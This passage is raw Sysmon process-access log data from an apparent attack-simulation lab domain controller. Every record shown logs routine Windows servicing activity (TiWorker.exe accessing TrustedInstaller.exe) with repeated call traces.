dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.508{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.508{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.492{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.476{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.476{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.461{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.461{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.445{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.430{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.430{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.414{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\Syst